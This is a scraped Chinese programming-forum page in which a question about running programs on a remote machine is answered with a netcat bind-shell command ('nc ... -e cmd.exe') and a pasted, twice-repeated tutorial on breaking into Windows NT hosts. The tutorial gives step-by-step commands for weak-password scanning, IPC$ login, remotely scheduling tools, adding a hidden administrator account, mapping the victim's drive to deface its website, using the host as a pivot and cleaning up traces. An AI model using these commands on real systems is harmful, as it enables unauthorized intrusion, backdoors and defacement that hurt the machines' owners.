怎么样在本地机器上使远程机器上的程序运行起来? 怎么样在本地机器上使远程机器上的程序运行起来? 解决方案 » 免费领取超大流量手机卡,每月29元包185G流量+100分钟通话, 中国电信官方发货 at \\192.168.0.10 15:59 nc -l -p 1234 -t -e cmd.exe 简单入侵NT主机 我先说一说入侵的过程,入侵用到的工具只是流光2001,系统是WIN2000。1、先找台肉机,用流光进行NT/98扫描,对扫到的主机进行IPC登录,即使是简单测试,都可以试出很多主机的用户和密码。(OK,现在找到一个用户名与密码相同的肉机,当然是要有admin权限的用户了)2、回到系统,在“命令提示符”下,IPC登录:net use \\ip\ipc$ "password" /user:username把流光TOOLS目录中的SRV.EXE 与 NTLM.EXE拷贝到肉机copy srv.exe \\ip\admin$\system32copy ntlm.exe \\ip\admin$\system32net time \\ip #查看肉机当前时间at \\ip time srv.exe #用AT命令执行SRV.EXE,这里的时间要比查看的时间晚两分钟左右,可以用AT \\IP 来查看指定执行命令的状况等几分钟,命令执行完成,telnet xxx.xxx.xxx.xxx 99 登录成功。要做如下事:c:\net user newboys 12345 /add #添加名叫newboys的用户,密码为12345c:\net localgroup administrators newboys /add #把newboys用户放入管理员组中(成超级用户了^&^)c:\ntlm #运行刚拷到肉机上的ntlm.exe,其作用是把telnet变为明文传输。(流光2001中是这么说的)运行完NTLM.EXE 后,用EXIT 断开连接。回到命令提示符下: 利用TOOLS目录中的NETSVC.EXE中断肉机TELNET服务netsvc \\ip telnet /stop #关闭指定ip的telnet服务netsvc \\ip telnet /start #打开指定ip的telnet服务其实如果指定ip以前未开telnet服务直接打"netsvc \\ip telnet /start"就行了。现在登录:telnet \\ip 登录到了肉机,在这种状态下,再利用IPC登录,登录目标主机.(目标机的用户名和密码同样是用流光获得的,当然也是admin权限的用户啦)net use \\ip\ipc$ "password"/user:usernamenet use x: \\ip\c$ 将他的c盘映射到本地的X盘,(因为一般默认目录在c盘下面,默认存放网页的路径是c:\inetpub\wwwroot)把你事先准备好的网页拷到其web目录中,整个黑网站的过程就此算完成了一大半了。最后是清理战场,把拷到肉机上的东东全删了。exit后黑网站的全过程结束。小结:以上的文章教了你用黑一个网站(由于网站管理员错误造成的)和如何做一个跳板。以后你可以用newboys这个账号登陆到那个肉机了(这可是你自己的跳板呀)。请不要拿国内主机进行试验。 vb activex 如何判断文件是否存在 VBA6.Dll 关于ExecuteLine 的问题 如何用VB控制打开文件夹中最后生成的文件(。txt) 一个关于数据库查询的问题 VB中如何实现对象的clone? 请教高手关于MSFlexGrid控件的问题 一个关于vba地应用问题?合并文档 打印报表导出的问题 获得连接网络(断开网络)时间得API函数是什么? 请你帮助看看代码,谢谢 真是怪事~引用EXCEL后出错!
我先说一说入侵的过程,入侵用到的工具只是流光2001,系统是WIN2000。1、先找台肉机,用流光进行NT/98扫描,对扫到的主机进行IPC登录,即使是简单测试,都可以试出很多主机的用户和密码。(OK,现在找到一个用户名与密码相同的肉机,当然是要有admin权限的用户了)
2、回到系统,在“命令提示符”下,IPC登录:
net use \\ip\ipc$ "password" /user:username
把流光TOOLS目录中的SRV.EXE 与 NTLM.EXE拷贝到肉机
copy srv.exe \\ip\admin$\system32
copy ntlm.exe \\ip\admin$\system32net time \\ip #查看肉机当前时间
at \\ip time srv.exe #用AT命令执行SRV.EXE,这里的时间要比查看的时间晚两分钟左右,可以用AT \\IP 来查看指定执行命令的状况等几分钟,命令执行完成,telnet xxx.xxx.xxx.xxx 99 登录成功。要做如下事:
c:\net user newboys 12345 /add #添加名叫newboys的用户,密码为12345
c:\net localgroup administrators newboys /add #把newboys用户放入管理员组中(成超级用户了^&^)
c:\ntlm #运行刚拷到肉机上的ntlm.exe,其作用是把telnet变为明文传输。(流光2001中是这么说的)
运行完NTLM.EXE 后,用EXIT 断开连接。回到命令提示符下: 利用TOOLS目录中的NETSVC.EXE中断肉机TELNET服务
netsvc \\ip telnet /stop #关闭指定ip的telnet服务
netsvc \\ip telnet /start #打开指定ip的telnet服务
其实如果指定ip以前未开telnet服务直接打"netsvc \\ip telnet /start"就行了。
现在登录:
telnet \\ip 登录到了肉机,在这种状态下,再利用IPC登录,登录目标主机.(目标机的用户名和密码同样是用流光获得的,当然也是admin权限的用户啦)
net use \\ip\ipc$ "password"/user:username
net use x: \\ip\c$ 将他的c盘映射到本地的X盘,(因为一般默认目录在c盘下面,默认存放网页的路径是
c:\inetpub\wwwroot)
把你事先准备好的网页拷到其web目录中,整个黑网站的过程就此算完成了一大半了。最后是清理战场,把拷到肉机上的东东全删了。exit后黑网站的全过程结束。小结:以上的文章教了你用黑一个网站(由于网站管理员错误造成的)和如何做一个跳板。以后你可以用
newboys这个账号登陆到那个肉机了(这可是你自己的跳板呀)。请不要拿国内主机进行试验。